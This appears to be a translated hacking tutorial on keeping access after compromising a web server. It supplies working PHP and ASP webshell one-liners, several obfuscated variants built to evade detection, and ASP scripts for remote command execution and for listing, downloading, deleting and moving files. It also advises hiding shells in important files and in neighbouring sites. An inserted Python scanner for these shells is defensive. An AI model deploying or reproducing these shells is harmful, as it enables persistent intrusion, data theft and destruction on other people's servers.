What to do after obtaining a webshell

Outline: dumping databases (MySQL, Access, MSSQL, PostgreSQL, Oracle), privilege escalation, maintaining access

Maintaining access

WebShell

A large webshell ("big horse") is usually deleted once the administrator notices it, so upload some stealthier one-liners or scripts with minimal functionality instead.
If there is a neighbouring site on the same server, insert the WebShell into that site. A one-liner can be inserted into certain important files.
When inserting it, it is best to wrap it in a check, which prevents errors:
<?php if(isset($_POST['1'])){eval($_POST['1']);}?>

ASP

File extensions
ashx asp aspx ascx asmx
Ways to bypass detection
If wscript.xxxxxx cannot be used, the object can be invoked via its classID instead; the classID differs from version to version.
<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
One-liners
Plain one-liners
<%eval request("MH")%>
<%eval request(chr(35))%>
<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>
Encoded one-liner; note that eval itself is still not removed
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

Since <%%> and <script language=javascript runat=server></script> are essentially equivalent, the percent signs can be dropped.

Using VBS encoding

<script language=vbs runat=server>
' The hex string decodes to execute(request(chr(35))); HextoStr rebuilds it as an EXECUTE statement
Execute(HextoStr("65786563757465287265717565737428636872283335292929"))
Function HextoStr(data)
	HextoStr="EXECUTE """""
	C="&CHR(&H"
	N=")"
	Do While Len(data)>1
		If IsNumeric(Left(data,1)) Then
			' leading digit: consume two hex digits as one character
			HextoStr=HextoStr&C&Left(data,2)&N
			data=Mid(data,3)
		Else
			' leading letter: consume four hex digits as one character
			HextoStr=HextoStr&C&Left(data,4)&N
			data=Mid(data,5)
		End If
	Loop
End Function
</script>
Using JS encoding

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode( 
116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPt>

Using ScriptControl (this one was not tested carefully)

<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) ' the SubCode parameter supplies the procedure code
o.run "e",Server,Response,Request,Application,Session,Error ' call the procedure named e, passing the 6 base objects as arguments
%>

Enter in the URL:

http://localhost/tmp.asp?
SubCode=sub e(Server,Response,Request,Application,Session,Error) eval(request("v")) end sub&v=response.write(server.mappath("tmp.asp"))
Or write the following into the Caidao (China Chopper) configuration:
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
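As an added defender-side example (not part of the original post), a small Python scanner that flags the PHP one-liner, the plain and encoded ASP one-liners and the bypass variants listed above, and decodes the hex and fromCharCode payloads to show what they would execute. The sample file contents are constructed from the page's own snippets, and the CLSID is a placeholder.

```python
import re

# Constructed sample file contents (not real artifacts): each mirrors one of
# the webshell variants shown on the page, plus one benign page for contrast.
SAMPLES = {
    "a.php": "<?php if(isset($_POST['1'])){eval($_POST['1']);}?>",
    "b.asp": '<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>',
    "c.asp": '<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&")"&")")%>',
    "d.asp": '<script language=vbs runat=server>Execute(HextoStr('
             '"65786563757465287265717565737428636872283335292929"))</script>',
    "e.asp": "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(String.fromCharCode("
             "116,114,121,123,101,118,97,108,40,82,101,113,117,101,115,116,46,102,111,114,"
             "109,40,39,35,39,41,43,39,39,41,125,99,97,116,99,104,40,101,41,123,125))</SCRIPT>",
    "f.asp": '<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsid:PLACEHOLDER"></ObjEct>',
    "g.asp": '<% Set o = Server.CreateObject("ScriptControl") %>',
    "h.asp": '<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>',
    "index.asp": '<% Response.Write "hello" %>',
}

# (rule name, pattern, optional decoder applied to group 1 to reveal the hidden payload)
RULES = [
    ("php-eval-request", re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I), None),
    ("asp-eval-request", re.compile(r"(?:eval|execute|executeglobal)\s*\(?\s*request\b", re.I), None),
    ("asp-char-concat", re.compile(r'(?:"."\s*&\s*){4,}'), None),  # "e"&"v"&"a"&"l" style splitting
    ("asp-hex-execute", re.compile(r'HextoStr\(\s*"([0-9a-f]+)"', re.I), lambda h: bytes.fromhex(h).decode("latin-1")),
    ("js-fromcharcode", re.compile(r"fromCharCode\(\s*([\d,\s]+)\)", re.I), lambda s: "".join(chr(int(c)) for c in s.split(","))),
    ("runat-server-object", re.compile(r'<object[^>]*\brunat\s*=\s*"?server\b[^>]*\bclassid', re.I), None),
    ("scriptcontrol", re.compile(r'CreateObject\(\s*"ScriptControl"', re.I), None),
    ("wscript-shell", re.compile(r'CreateObject\(\s*"wscript\.shell"', re.I), None),
]

def scan(content):
    """Return [(rule name, decoded payload or None)] for every rule that fires on one file."""
    hits = []
    for name, pattern, decoder in RULES:
        m = pattern.search(content)
        if not m:
            continue
        try:
            decoded = decoder(m.group(1)) if decoder else None
        except ValueError:  # odd-length hex or junk numbers: still report the rule
            decoded = "<undecodable>"
        hits.append((name, decoded))
    return hits

def scan_files(files):
    """Scan a {name: content} mapping; only files with at least one hit are returned."""
    return {name: h for name, content in files.items() if (h := scan(content))}
```

The decoded payloads are what the page's encoded variants hide: the hex string is execute(request(chr(35))) and the charCode list is try{eval(Request.form('#')+'')}catch(e){}.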


Listing directories
<%@ Language=vbscript %>
<%
' Function that walks a directory and lists the files under it
%>
<%
Function Bianli(path,Recursion)
	Set Fso=server.createobject("scripting.filesystemobject")
	On Error Resume Next
	Set Objfolder=fso.getfolder(path)
	Set Objsubfolders=Objfolder.subfolders
	Set Objfile = Objfolder.Files

	Response.write path
	For Each file in Objfile
		Response.write "<br>---"
		Response.write file.name
	Next

	For Each Objsubfolder In Objsubfolders
		Response.write "<p>"
		' Recursion arrives as a string from the request, so compare it as one
		if Recursion<>"" and Recursion<>"0" then
			call Bianli(path&"\"&Objsubfolder.name,Recursion) ' recurse into the subfolder
		end if
	Next
	Set Objfolder=nothing
	Set Objsubfolders=nothing
	Set Fso=nothing
End Function
%>
<%
dim path,Recursion
path = request("path")
Recursion = request("Recursion")
call Bianli(path,Recursion) ' walk the path given in the request
%>
<html>
<p>Testing...</p>
</html>

Downloading files
<%@ language=vbscript codepage=65001%>

<%
'Filename must be input
if Request("Filename")="" then
response.write "<h1>Error:</h1>Filename is empty!<p>"
else
call downloadFile(Request("Filename"))

Function downloadFile(strFile)
' make sure you are on the latest MDAC version for this to work
' get full path of specified file
'strFilename = server.MapPath(strFile)

strFilename = strFile

' clear the buffer
Response.Buffer = True
Response.Clear

' create stream
Set s = Server.CreateObject("ADODB.Stream")
s.Open

' Set as binary
s.Type = 1

' load in the file
on error resume next

' check the file exists
Set fso = Server.CreateObject("Scripting.FileSystemObject")
if not fso.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>"&strFilename&" does not exist!<p>")
Response.End
end if

' get length of file
Set f = fso.GetFile(strFilename)
intFilelength = f.size

s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>Unknown Error!<p>")
Response.End
end if

' send the headers to the user's browser
Response.AddHeader "Content-Disposition","attachment; filename="&f.name
Response.AddHeader "Content-Length",intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"

' output the file to the browser
Response.BinaryWrite s.Read
Response.Flush

' tidy up
s.Close
Set s = Nothing

End Function
end if
%>
Executing commands
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

If you upload your own cmd.exe, write it like this:

<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c "&request("c")).stdout.readall%>

Deleting files
<%
filepath=request("path")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile(filepath)
Set fso = nothing
%>
Renaming files
<%
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(request("path"))
f.name =request("filename")
newname=f.name
response.write "Renamed to "&newname
%>
Moving files
<%
dim fso
set fso = server.createobject("scripting.filesystemobject")
' MoveFolder moves a directory; use MoveFile for a single file
fso.movefolder request("name1"),request("name2")
set fso = nothing
%>
Copying files
<%
dim MyFSO
set MyFSO=Server.CreateObject("Scripting.FileSystemObject")
MyFSO.CopyFile request("name1"),request("name2")
set MyFSO=nothing
%>